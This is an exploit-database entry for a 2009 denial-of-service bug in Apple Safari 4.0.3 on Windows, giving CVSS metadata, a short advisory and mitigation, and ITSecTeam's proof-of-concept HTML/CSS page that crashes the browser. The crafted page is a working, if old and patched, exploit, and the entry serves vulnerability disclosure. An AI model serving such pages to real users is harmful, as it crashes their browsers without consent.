Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit

vendor:

Safari

by:

ITSecTeam

7,8

CVSS

HIGH

Denial of Service

CWE

Product Name: Safari

Affected Version From: 4.0.3

Affected Version To: 4.0.3

Patch Exists: YES

Related CWE: N/A

CPE: a:apple:safari:4.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win32

2009

Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit

A vulnerability exists in Apple Safari 4.0.3 (Win32) which allows a remote attacker to cause a denial of service condition. The vulnerability is caused due to an error in the handling of CSS tags and can be exploited to crash the browser by sending a specially crafted HTML page to the user. Successful exploitation of this vulnerability may allow an attacker to crash the browser of the user.

Mitigation:

Upgrade to the latest version of Apple Safari.

Source

Exploit-DB raw data:

===============================================================
Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit
===============================================================
################## In The Name Of Allah ########################
#Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit
#Tested on Safari 4.0.3.0 (4.531.9.1)
#vendor : http://www.apple.com/safari
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Original Advisory:
#http://www.itsecteam.com/en/vulnerabilities/vulnerability49.htm
#Special Thanks: b3hz4d,M3hr@n.s,Cdef3nder,PLATEN
################################################################

<html dir="rtl">
<body>
<style type="text/css">
.crash {
position:relative;
padding: 4px 6px;
display:inline-block;
}
.crash img {
position:absolute;
}
</style>
<div class="crash">
<P><img></p> you can replace <p> tags with any other tags, but you
shouldnt change <img> tag
</div>
</body>
</html>